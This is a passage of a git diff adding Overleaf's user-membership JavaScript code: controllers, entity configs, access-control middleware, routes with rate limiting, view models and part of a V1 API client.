await RecurlyClient.promises.getSubscription( + subscription.recurlySubscription_id + ) + : undefined + + const canUseAddSeatsFeature = + plan?.canUseFlexibleLicensing && + isAdmin && + recurlySubscription && + !recurlySubscription.pendingChange + + res.render('user_membership/group-members-react', { + name: entityName, + groupId: entityPrimaryKey, + users, + groupSize: subscription.membersLimit, + managedUsersActive: subscription.managedUsersEnabled, + groupSSOActive: ssoConfig?.enabled, + canUseFlexibleLicensing: plan?.canUseFlexibleLicensing, + canUseAddSeatsFeature, + }) +} + +async function manageGroupManagers(req, res, next) { + await _renderManagersPage( + req, + res, + next, + 'user_membership/group-managers-react' + ) +} + +async function manageInstitutionManagers(req, res, next) { + await _renderManagersPage( + req, + res, + next, + 'user_membership/institution-managers-react' + ) +} + +async function managePublisherManagers(req, res, next) { + await _renderManagersPage( + req, + res, + next, + 'user_membership/publisher-managers-react' + ) +} + +async function _renderManagersPage(req, res, next, template) { + const { entity, entityConfig } = req + + const fetchV1Data = new Promise((resolve, reject) => { + entity.fetchV1Data((error, entity) => { + if (error) { + reject(error) + } else { + resolve(entity) + } + }) + }) + + const entityWithV1Data = await fetchV1Data + + const entityPrimaryKey = + entityWithV1Data[entityConfig.fields.primaryKey].toString() + let entityName + if (entityConfig.fields.name) { + entityName = entityWithV1Data[entityConfig.fields.name] + } + const users = await UserMembershipHandler.promises.getUsers( + entityWithV1Data, + entityConfig + ) + + res.render(template, { + name: entityName, + users, + groupId: entityPrimaryKey, + }) +} + +export default { + manageGroupMembers: expressify(manageGroupMembers), + manageGroupManagers: expressify(manageGroupManagers), + manageInstitutionManagers: expressify(manageInstitutionManagers), + managePublisherManagers: expressify(managePublisherManagers), + add(req, res, next) { + const { entity, entityConfig } = req + const email = EmailHelper.parseEmail(req.body.email) + if (email == null) { + return res.status(400).json({ + error: { + code: 'invalid_email', + message: req.i18n.translate('invalid_email'), + }, + }) + } + + if (entityConfig.readOnly) { + return next(new Errors.NotFoundError('Cannot add users to entity')) + } + + UserMembershipHandler.addUser( + entity, + entityConfig, + email, + function (error, user) { + if (error && error instanceof UserAlreadyAddedError) { + return res.status(400).json({ + error: { + code: 'user_already_added', + message: req.i18n.translate('user_already_added'), + }, + }) + } + if (error && error instanceof UserNotFoundError) { + return res.status(404).json({ + error: { + code: 'user_not_found', + message: req.i18n.translate('user_not_found'), + }, + }) + } + if (error != null) { + return next(error) + } + res.json({ user }) + } + ) + }, + remove(req, res, next) { + const { entity, entityConfig } = req + const { userId } = req.params + + if (entityConfig.readOnly) { + return next(new Errors.NotFoundError('Cannot remove users from entity')) + } + + const loggedInUserId = SessionManager.getLoggedInUserId(req.session) + if (loggedInUserId === userId) { + return res.status(400).json({ + error: { + code: 'managers_cannot_remove_self', + message: req.i18n.translate('managers_cannot_remove_self'), + }, + }) + } + + UserMembershipHandler.removeUser( + entity, + entityConfig, + userId, + 
function (error, user) { + if (error && error instanceof UserIsManagerError) { + return res.status(400).json({ + error: { + code: 'managers_cannot_remove_admin', + message: req.i18n.translate('managers_cannot_remove_admin'), + }, + }) + } + if (error != null) { + return next(error) + } + res.sendStatus(200) + } + ) + }, + exportCsv(req, res, next) { + const { entity, entityConfig } = req + const fields = ['email', 'last_logged_in_at', 'last_active_at'] + + UserMembershipHandler.getUsers( + entity, + entityConfig, + function (error, users) { + if (error != null) { + return next(error) + } + const csvParser = new CSVParser({ fields }) + csvAttachment(res, csvParser.parse(users), 'Group.csv') + } + ) + }, + new(req, res, next) { + res.render('user_membership/new', { + entityName: req.params.name, + entityId: req.params.id, + }) + }, + create(req, res, next) { + const entityId = req.params.id + const entityConfig = req.entityConfig + + UserMembershipHandler.createEntity( + entityId, + entityConfig, + function (error, entity) { + if (error != null) { + return next(error) + } + res.redirect(entityConfig.pathsFor(entityId).index) + } + ) + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipEntityConfigs.js b/services/web/app/src/Features/UserMembership/UserMembershipEntityConfigs.js new file mode 100644 index 0000000..c65f38e --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipEntityConfigs.js @@ -0,0 +1,111 @@ +module.exports = { + group: { + modelName: 'Subscription', + readOnly: true, + hasMembersLimit: true, + fields: { + primaryKey: '_id', + read: ['invited_emails', 'teamInvites', 'member_ids'], + write: null, + access: 'manager_ids', + membership: 'member_ids', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + team: { + // for metrics only + modelName: 'Subscription', + fields: { + primaryKey: 'overleaf.id', + access: 'manager_ids', + }, + baseQuery: { + groupPlan: true, + }, + }, + + groupManagers: { + modelName: 'Subscription', + fields: { + primaryKey: '_id', + read: ['manager_ids'], + write: 'manager_ids', + access: 'manager_ids', + membership: 'member_ids', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + groupMember: { + modelName: 'Subscription', + readOnly: true, + hasMembersLimit: true, + fields: { + primaryKey: '_id', + read: ['member_ids'], + write: null, + access: 'member_ids', + membership: 'member_ids', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + groupAdmin: { + modelName: 'Subscription', + fields: { + primaryKey: '_id', + read: ['admin_id'], + write: null, + access: 'admin_id', + membership: 'admin_id', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + institution: { + modelName: 'Institution', + fields: { + primaryKey: 'v1Id', + read: ['managerIds'], + write: 'managerIds', + access: 'managerIds', + membership: 'member_ids', + name: 'name', + }, + pathsFor(id) { + return { + index: `/manage/institutions/${id}/managers`, + } + }, + }, + + publisher: { + modelName: 'Publisher', + fields: { + primaryKey: 'slug', + read: ['managerIds'], + write: 'managerIds', + access: 'managerIds', + membership: 'member_ids', + name: 'name', + }, + pathsFor(id) { + return { + index: `/manage/publishers/${id}/managers`, + } + }, + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipErrors.js b/services/web/app/src/Features/UserMembership/UserMembershipErrors.js new file mode 100644 index 0000000..6667ced --- /dev/null 
+++ b/services/web/app/src/Features/UserMembership/UserMembershipErrors.js @@ -0,0 +1,11 @@ +const OError = require('@overleaf/o-error') + +class UserIsManagerError extends OError {} +class UserNotFoundError extends OError {} +class UserAlreadyAddedError extends OError {} + +module.exports = { + UserIsManagerError, + UserNotFoundError, + UserAlreadyAddedError, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipHandler.js b/services/web/app/src/Features/UserMembership/UserMembershipHandler.js new file mode 100644 index 0000000..0632f6e --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipHandler.js @@ -0,0 +1,120 @@ +const { ObjectId } = require('mongodb-legacy') +const { promisifyAll, callbackify } = require('@overleaf/promise-utils') +const EntityModels = { + Institution: require('../../models/Institution').Institution, + Subscription: require('../../models/Subscription').Subscription, + Publisher: require('../../models/Publisher').Publisher, +} +const UserMembershipViewModel = require('./UserMembershipViewModel') +const UserGetter = require('../User/UserGetter') +const { + UserIsManagerError, + UserNotFoundError, + UserAlreadyAddedError, +} = require('./UserMembershipErrors') + +const UserMembershipHandler = { + async getEntityWithoutAuthorizationCheck(entityId, entityConfig) { + const query = buildEntityQuery(entityId, entityConfig) + return await EntityModels[entityConfig.modelName].findOne(query).exec() + }, + + async createEntity(entityId, entityConfig) { + const data = buildEntityQuery(entityId, entityConfig) + return await EntityModels[entityConfig.modelName].create(data) + }, + + async getUsers(entity, entityConfig) { + const attributes = entityConfig.fields.read + return await getPopulatedListOfMembers(entity, attributes) + }, + + async addUser(entity, entityConfig, email) { + const attribute = entityConfig.fields.write + const user = await UserGetter.promises.getUserByAnyEmail(email) + + if (!user) { + throw new UserNotFoundError() + } + + if (entity[attribute].some(managerId => managerId.equals(user._id))) { + throw new UserAlreadyAddedError() + } + + await addUserToEntity(entity, attribute, user) + return UserMembershipViewModel.build(user) + }, + + async removeUser(entity, entityConfig, userId) { + const attribute = entityConfig.fields.write + if (entity.admin_id ? entity.admin_id.equals(userId) : undefined) { + throw new UserIsManagerError() + } + return await removeUserFromEntity(entity, attribute, userId) + }, +} + +UserMembershipHandler.promises = promisifyAll(UserMembershipHandler) +module.exports = { + getEntityWithoutAuthorizationCheck: callbackify( + UserMembershipHandler.getEntityWithoutAuthorizationCheck + ), + createEntity: callbackify(UserMembershipHandler.createEntity), + getUsers: callbackify(UserMembershipHandler.getUsers), + addUser: callbackify(UserMembershipHandler.addUser), + removeUser: callbackify(UserMembershipHandler.removeUser), + promises: UserMembershipHandler, +} + +async function getPopulatedListOfMembers(entity, attributes) { + const userObjects = [] + + for (const attribute of attributes) { + for (const userObject of entity[attribute] || []) { + // userObject can be an email as String, a user id as ObjectId or an + // invite as Object with an email attribute as String. 
We want to pass to
+      // UserMembershipViewModel either an email (String) or a user id (ObjectId)
+      const userIdOrEmail = userObject.email || userObject
+      userObjects.push(userIdOrEmail)
+    }
+  }
+
+  const users = await Promise.all(
+    userObjects.map(userObject =>
+      UserMembershipViewModel.promises.buildAsync(userObject)
+    )
+  )
+
+  for (const user of users) {
+    if (
+      user?._id &&
+      entity?.admin_id &&
+      user._id.toString() === entity.admin_id.toString()
+    ) {
+      user.isEntityAdmin = true
+    }
+  }
+
+  return users
+}
+
+async function addUserToEntity(entity, attribute, user) {
+  const fieldUpdate = {}
+  fieldUpdate[attribute] = user._id
+  return await entity.updateOne({ $addToSet: fieldUpdate }).exec()
+}
+
+async function removeUserFromEntity(entity, attribute, userId) {
+  const fieldUpdate = {}
+  fieldUpdate[attribute] = userId
+  return await entity.updateOne({ $pull: fieldUpdate }).exec()
+}
+
+function buildEntityQuery(entityId, entityConfig) {
+  if (ObjectId.isValid(entityId.toString())) {
+    entityId = new ObjectId(entityId)
+  }
+  const query = Object.assign({}, entityConfig.baseQuery)
+  query[entityConfig.fields.primaryKey] = entityId
+  return query
+}
diff --git a/services/web/app/src/Features/UserMembership/UserMembershipMiddleware.js b/services/web/app/src/Features/UserMembership/UserMembershipMiddleware.js
new file mode 100644
index 0000000..f125496
--- /dev/null
+++ b/services/web/app/src/Features/UserMembership/UserMembershipMiddleware.js
@@ -0,0 +1,334 @@
+const { expressify } = require('@overleaf/promise-utils')
+const async = require('async')
+const UserMembershipAuthorization = require('./UserMembershipAuthorization')
+const AuthenticationController = require('../Authentication/AuthenticationController')
+const UserMembershipHandler = require('./UserMembershipHandler')
+const EntityConfigs = require('./UserMembershipEntityConfigs')
+const Errors = require('../Errors/Errors')
+const HttpErrorHandler = require('../Errors/HttpErrorHandler')
+const TemplatesManager = require('../Templates/TemplatesManager')
+
+// set of middleware arrays or functions that check user access to an entity
+// (publisher, institution, group, template, etc.)
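+//
+// Each `require...Access` value below is an array of plain Express middleware,
+// so it can be passed directly to a route definition, as UserMembershipRouter.mjs
+// (later in this commit) does:
+//
+//   webRouter.get(
+//     '/manage/groups/:id/members',
+//     UserMembershipMiddleware.requireGroupManagementAccess,
+//     UserMembershipController.manageGroupMembers
+//   )
+//
+// Express runs each function of the array in order: authenticate, load the
+// entity config and entity onto `req`, then check access.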
+const UserMembershipMiddleware = { + requireTeamMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('team'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupMetrics'), + ]), + ], + + requireGroup: [fetchEntityConfig('group'), fetchEntity(), requireEntity()], + + requireGroupAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('group'), + fetchEntity(), + requireEntity(), + ], + + requireGroupMemberAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('groupMember'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([UserMembershipAuthorization.hasEntityAccess()]), + ], + + requireGroupManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('group'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupManagement'), + ]), + ], + + requireGroupMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('group'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupMetrics'), + ]), + ], + + requireGroupManagersManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('groupManagers'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupManagement'), + ]), + ], + + requireGroupAdminAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('groupAdmin'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupManagement'), + ]), + ], + + requireInstitutionMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('institution'), + fetchEntity(), + requireEntityOrCreate('institutionManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('institutionMetrics'), + ]), + ], + + requireInstitutionManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('institution'), + fetchEntity(), + requireEntityOrCreate('institutionManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('institutionManagement'), + ]), + ], + + requireInstitutionManagementStaffAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('institutionManagement'), + ]), + fetchEntityConfig('institution'), + fetchEntity(), + requireEntityOrCreate('institutionManagement'), + ], + + requirePublisherMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('publisher'), + fetchEntity(), + requireEntityOrCreate('publisherManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherMetrics'), + ]), + ], + + requirePublisherManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('publisher'), + fetchEntity(), + requireEntityOrCreate('publisherManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherManagement'), + ]), 
+ ], + + requireConversionMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('publisher'), + fetchEntity(), + requireEntityOrCreate('publisherManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherMetrics'), + ]), + ], + + requireAdminMetricsAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('adminMetrics'), + ]), + ], + + requireTemplateMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchV1Template(), + requireV1Template(), + fetchEntityConfig('publisher'), + fetchPublisherFromTemplate(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherMetrics'), + ]), + ], + + requirePublisherCreationAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('publisherManagement'), + ]), + fetchEntityConfig('publisher'), + ], + + requireInstitutionCreationAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('institutionManagement'), + ]), + fetchEntityConfig('institution'), + ], + + requireSplitTestMetricsAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('splitTestMetrics'), + UserMembershipAuthorization.hasStaffAccess('splitTestManagement'), + ]), + ], + + requireSplitTestManagementAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('splitTestManagement'), + ]), + ], + + // graphs access is an edge-case: + // - the entity id is in `req.query.resource_id`. It must be set as + // `req.params.id` + // - the entity name is in `req.query.resource_type` and is used to find the + // require middleware depending on the entity name + requireGraphAccess(req, res, next) { + req.params.id = req.query.resource_id + let entityName = req.query.resource_type + if (!entityName) { + return HttpErrorHandler.notFound(req, res, 'resource_type param missing') + } + entityName = entityName.charAt(0).toUpperCase() + entityName.slice(1) + + const middleware = + UserMembershipMiddleware[`require${entityName}MetricsAccess`] + if (!middleware) { + return HttpErrorHandler.notFound( + req, + res, + `incorrect entity name: ${entityName}` + ) + } + // run the list of middleware functions in series. 
This is essentially
+    // a poor man's middleware runner
+    async.eachSeries(middleware, (fn, callback) => fn(req, res, callback), next)
+  },
+}
+
+module.exports = UserMembershipMiddleware
+
+// fetch entity config and set it in the request
+function fetchEntityConfig(entityName) {
+  return (req, res, next) => {
+    const entityConfig = EntityConfigs[entityName]
+    req.entityName = entityName
+    req.entityConfig = entityConfig
+    next()
+  }
+}
+
+// fetch the entity with id and config, and set it in the request
+function fetchEntity() {
+  return expressify(async (req, res, next) => {
+    req.entity =
+      await UserMembershipHandler.promises.getEntityWithoutAuthorizationCheck(
+        req.params.id,
+        req.entityConfig
+      )
+    next()
+  })
+}
+
+function fetchPublisherFromTemplate() {
+  return (req, res, next) => {
+    if (req.template.brand.slug) {
+      // set the id as the publisher's id as it's the entity used for access
+      // control
+      req.params.id = req.template.brand.slug
+      return fetchEntity()(req, res, next)
+    } else {
+      return next()
+    }
+  }
+}
+
+// ensure an entity was found, or fail with 404
+function requireEntity() {
+  return (req, res, next) => {
+    if (req.entity) {
+      return next()
+    }
+
+    throw new Errors.NotFoundError(
+      `no '${req.entityName}' entity with '${req.params.id}'`
+    )
+  }
+}
+
+// ensure an entity was found or redirect to entity creation page if the user
+// has permissions to create the entity, or fail with 404
+function requireEntityOrCreate(creationStaffAccess) {
+  return (req, res, next) => {
+    if (req.entity) {
+      return next()
+    }
+
+    if (UserMembershipAuthorization.hasStaffAccess(creationStaffAccess)(req)) {
+      res.redirect(`/entities/${req.entityName}/create/${req.params.id}`)
+      return
+    }
+
+    throw new Errors.NotFoundError(
+      `no '${req.entityName}' entity with '${req.params.id}'`
+    )
+  }
+}
+
+// fetch the template from v1, and set it in the request
+function fetchV1Template() {
+  return expressify(async (req, res, next) => {
+    const templateId = req.params.id
+    const body = await TemplatesManager.promises.fetchFromV1(templateId)
+    req.template = {
+      id: body.id,
+      title: body.title,
+      brand: body.brand,
+    }
+    next()
+  })
+}
+
+// ensure a template was found, or fail with 404
+function requireV1Template() {
+  return (req, res, next) => {
+    if (req.template.id) {
+      return next()
+    }
+
+    throw new Errors.NotFoundError('no template found')
+  }
+}
+
+// run a series of synchronous access functions and call `next` if any of the
+// return values is truthy.
Redirect to restricted otherwise +function allowAccessIfAny(accessFunctions) { + return (req, res, next) => { + for (const accessFunction of accessFunctions) { + if (accessFunction(req)) { + return next() + } + } + HttpErrorHandler.forbidden(req, res) + } +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipRouter.mjs b/services/web/app/src/Features/UserMembership/UserMembershipRouter.mjs new file mode 100644 index 0000000..7013b1c --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipRouter.mjs @@ -0,0 +1,131 @@ +import UserMembershipMiddleware from './UserMembershipMiddleware.js' +import UserMembershipController from './UserMembershipController.mjs' +import SubscriptionGroupController from '../Subscription/SubscriptionGroupController.mjs' +import TeamInvitesController from '../Subscription/TeamInvitesController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' + +const rateLimiters = { + createTeamInvite: new RateLimiter('create-team-invite', { + points: 200, + duration: 60, + }), + exportTeamCsv: new RateLimiter('export-team-csv', { + points: 30, + duration: 60, + }), +} + +export default { + apply(webRouter) { + // group members routes + webRouter.get( + '/manage/groups/:id/members', + UserMembershipMiddleware.requireGroupManagementAccess, + UserMembershipController.manageGroupMembers + ) + webRouter.post( + '/manage/groups/:id/invites', + UserMembershipMiddleware.requireGroupManagementAccess, + RateLimiterMiddleware.rateLimit(rateLimiters.createTeamInvite), + TeamInvitesController.createInvite + ) + webRouter.post( + '/manage/groups/:id/resendInvite', + UserMembershipMiddleware.requireGroupManagementAccess, + RateLimiterMiddleware.rateLimit(rateLimiters.createTeamInvite), + TeamInvitesController.resendInvite + ) + webRouter.delete( + '/manage/groups/:id/user/:user_id', + UserMembershipMiddleware.requireGroupManagementAccess, + SubscriptionGroupController.removeUserFromGroup + ) + webRouter.delete( + '/manage/groups/:id/invites/:email', + UserMembershipMiddleware.requireGroupManagementAccess, + TeamInvitesController.revokeInvite + ) + webRouter.get( + '/manage/groups/:id/members/export', + UserMembershipMiddleware.requireGroupManagementAccess, + RateLimiterMiddleware.rateLimit(rateLimiters.exportTeamCsv), + UserMembershipController.exportCsv + ) + + // group managers routes + webRouter.get( + '/manage/groups/:id/managers', + UserMembershipMiddleware.requireGroupManagersManagementAccess, + UserMembershipController.manageGroupManagers + ) + webRouter.post( + '/manage/groups/:id/managers', + UserMembershipMiddleware.requireGroupManagersManagementAccess, + UserMembershipController.add + ) + webRouter.delete( + '/manage/groups/:id/managers/:userId', + UserMembershipMiddleware.requireGroupManagersManagementAccess, + UserMembershipController.remove + ) + + // institution members routes + webRouter.get( + '/manage/institutions/:id/managers', + UserMembershipMiddleware.requireInstitutionManagementAccess, + UserMembershipController.manageInstitutionManagers + ) + webRouter.post( + '/manage/institutions/:id/managers', + UserMembershipMiddleware.requireInstitutionManagementAccess, + UserMembershipController.add + ) + webRouter.delete( + '/manage/institutions/:id/managers/:userId', + UserMembershipMiddleware.requireInstitutionManagementAccess, + UserMembershipController.remove + ) + + // publisher members routes + webRouter.get( + 
'/manage/publishers/:id/managers', + UserMembershipMiddleware.requirePublisherManagementAccess, + UserMembershipController.managePublisherManagers + ) + webRouter.post( + '/manage/publishers/:id/managers', + UserMembershipMiddleware.requirePublisherManagementAccess, + UserMembershipController.add + ) + webRouter.delete( + '/manage/publishers/:id/managers/:userId', + UserMembershipMiddleware.requirePublisherManagementAccess, + UserMembershipController.remove + ) + + // publisher creation routes + webRouter.get( + '/entities/publisher/create/:id', + UserMembershipMiddleware.requirePublisherCreationAccess, + UserMembershipController.new + ) + webRouter.post( + '/entities/publisher/create/:id', + UserMembershipMiddleware.requirePublisherCreationAccess, + UserMembershipController.create + ) + + // institution creation routes + webRouter.get( + '/entities/institution/create/:id', + UserMembershipMiddleware.requireInstitutionCreationAccess, + UserMembershipController.new + ) + webRouter.post( + '/entities/institution/create/:id', + UserMembershipMiddleware.requireInstitutionCreationAccess, + UserMembershipController.create + ) + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipViewModel.js b/services/web/app/src/Features/UserMembership/UserMembershipViewModel.js new file mode 100644 index 0000000..6c94f67 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipViewModel.js @@ -0,0 +1,83 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const UserGetter = require('../User/UserGetter') +const { isObjectIdInstance } = require('../Helpers/Mongo') +const { promisify } = require('@overleaf/promise-utils') + +const UserMembershipViewModel = { + build(userOrEmail) { + if (userOrEmail._id) { + return buildUserViewModel(userOrEmail) + } else { + return buildUserViewModelWithEmail(userOrEmail) + } + }, + + buildAsync(userOrIdOrEmail, callback) { + if (callback == null) { + callback = function () {} + } + if (!isObjectIdInstance(userOrIdOrEmail)) { + // userOrIdOrEmail is a user or an email and can be parsed by #build + return callback(null, UserMembershipViewModel.build(userOrIdOrEmail)) + } + + const userId = userOrIdOrEmail + const projection = { + email: 1, + first_name: 1, + last_name: 1, + lastLoggedIn: 1, + lastActive: 1, + enrollment: 1, + } + return UserGetter.getUser(userId, projection, function (error, user) { + if (error != null || user == null) { + return callback(null, buildUserViewModelWithId(userId.toString())) + } + return callback(null, buildUserViewModel(user)) + }) + }, +} + +function buildUserViewModel(user, isInvite) { + if (isInvite == null) { + isInvite = false + } + return { + _id: user._id || null, + email: user.email || null, + first_name: user.first_name || null, + last_name: user.last_name || null, + last_active_at: user.lastActive || user.lastLoggedIn || null, + last_logged_in_at: user.lastLoggedIn || null, + invite: isInvite, + enrollment: user.enrollment + ? 
{
+          managedBy: user.enrollment.managedBy,
+          enrolledAt: user.enrollment.enrolledAt,
+          sso: user.enrollment.sso,
+        }
+      : undefined,
+  }
+}
+
+const buildUserViewModelWithEmail = email => buildUserViewModel({ email }, true)
+
+const buildUserViewModelWithId = id => buildUserViewModel({ _id: id }, false)
+
+UserMembershipViewModel.promises = {
+  buildAsync: promisify(UserMembershipViewModel.buildAsync),
+}
+
+module.exports = UserMembershipViewModel
diff --git a/services/web/app/src/Features/UserMembership/UserMembershipsHandler.js b/services/web/app/src/Features/UserMembership/UserMembershipsHandler.js
new file mode 100644
index 0000000..cbd12e4
--- /dev/null
+++ b/services/web/app/src/Features/UserMembership/UserMembershipsHandler.js
@@ -0,0 +1,83 @@
+/* eslint-disable
+    n/handle-callback-err,
+    max-len,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const async = require('async')
+const { promisifyAll } = require('@overleaf/promise-utils')
+const EntityModels = {
+  Institution: require('../../models/Institution').Institution,
+  Subscription: require('../../models/Subscription').Subscription,
+  Publisher: require('../../models/Publisher').Publisher,
+}
+const UserMembershipEntityConfigs = require('./UserMembershipEntityConfigs')
+
+const UserMembershipsHandler = {
+  removeUserFromAllEntities(userId, callback) {
+    // get all writable entity types
+    if (callback == null) {
+      callback = function () {}
+    }
+    const entityConfigs = []
+    for (const key in UserMembershipEntityConfigs) {
+      const entityConfig = UserMembershipEntityConfigs[key]
+      if (entityConfig.fields && entityConfig.fields.write != null) {
+        entityConfigs.push(entityConfig)
+      }
+    }
+
+    // remove the user from all entity types
+    async.map(
+      entityConfigs,
+      (entityConfig, innerCallback) =>
+        UserMembershipsHandler.removeUserFromEntities(
+          entityConfig,
+          userId,
+          innerCallback
+        ),
+      callback
+    )
+  },
+
+  removeUserFromEntities(entityConfig, userId, callback) {
+    if (callback == null) {
+      callback = function () {}
+    }
+    const removeOperation = { $pull: {} }
+    removeOperation.$pull[entityConfig.fields.write] = userId
+    EntityModels[entityConfig.modelName]
+      .updateMany({}, removeOperation)
+      .then(result => callback(null, result))
+      .catch(callback)
+  },
+
+  getEntitiesByUser(entityConfig, userId, callback) {
+    if (callback == null) {
+      callback = function () {}
+    }
+    const query = Object.assign({}, entityConfig.baseQuery)
+    query[entityConfig.fields.access] = userId
+    EntityModels[entityConfig.modelName]
+      .find(query)
+      .then(entities => {
+        if (entities == null) {
+          entities = []
+        }
+        async.mapSeries(
+          entities,
+          (entity, cb) => entity.fetchV1Data(cb),
+          callback
+        )
+      })
+      .catch(callback)
+  },
+}
+
+UserMembershipsHandler.promises = promisifyAll(UserMembershipsHandler)
+module.exports = UserMembershipsHandler
diff --git a/services/web/app/src/Features/V1/V1Api.js b/services/web/app/src/Features/V1/V1Api.js
new file mode 100644
index 0000000..ce15891
--- /dev/null
+++ b/services/web/app/src/Features/V1/V1Api.js
@@ -0,0 +1,106 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
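+//
+// Usage sketch (illustrative; the endpoint path is made up): callers pass
+// `request`-style options and get back `(error, response, body)`, with
+// non-success statuses mapped to typed errors unless they are listed in
+// `options.expectedStatusCodes`:
+//
+//   V1Api.request(
+//     { method: 'GET', uri: '/api/v1/overleaf/example', expectedStatusCodes: [404] },
+//     (error, response, body) => { /* ... */ }
+//   )
+//
+// or, via the promisified wrapper defined at the bottom of this file:
+//
+//   const { response, body } = await V1Api.promises.request({ uri: '/api/v1/overleaf/example' })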
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const request = require('request') +const settings = require('@overleaf/settings') +const Errors = require('../Errors/Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +// TODO: check what happens when these settings aren't defined +const DEFAULT_V1_PARAMS = { + baseUrl: settings.apis.v1.url, + auth: { + user: settings.apis.v1.user, + pass: settings.apis.v1.pass, + }, + json: true, + timeout: settings.apis.v1.timeout, +} + +const v1Request = request.defaults(DEFAULT_V1_PARAMS) + +const DEFAULT_V1_OAUTH_PARAMS = { + baseUrl: settings.apis.v1.url, + json: true, + timeout: settings.apis.v1.timeout, +} + +const v1OauthRequest = request.defaults(DEFAULT_V1_OAUTH_PARAMS) + +const V1Api = { + request(options, callback) { + if (callback == null) { + return request(options) + } + return v1Request(options, (error, response, body) => + V1Api._responseHandler(options, error, response, body, callback) + ) + }, + + oauthRequest(options, token, callback) { + if (options.uri == null) { + return callback(new Error('uri required')) + } + if (options.method == null) { + options.method = 'GET' + } + options.auth = { bearer: token } + return v1OauthRequest(options, (error, response, body) => + V1Api._responseHandler(options, error, response, body, callback) + ) + }, + + _responseHandler(options, error, response, body, callback) { + if (error != null) { + return callback( + new Errors.V1ConnectionError('error from V1 API').withCause(error) + ) + } + if (response && response.statusCode >= 500) { + return callback( + new Errors.V1ConnectionError({ + message: 'error from V1 API', + info: { status: response.statusCode, body }, + }) + ) + } + if ( + (response && response.statusCode >= 200 && response.statusCode < 300) || + Array.from(options.expectedStatusCodes || []).includes( + response?.statusCode + ) + ) { + return callback(null, response, body) + } else if 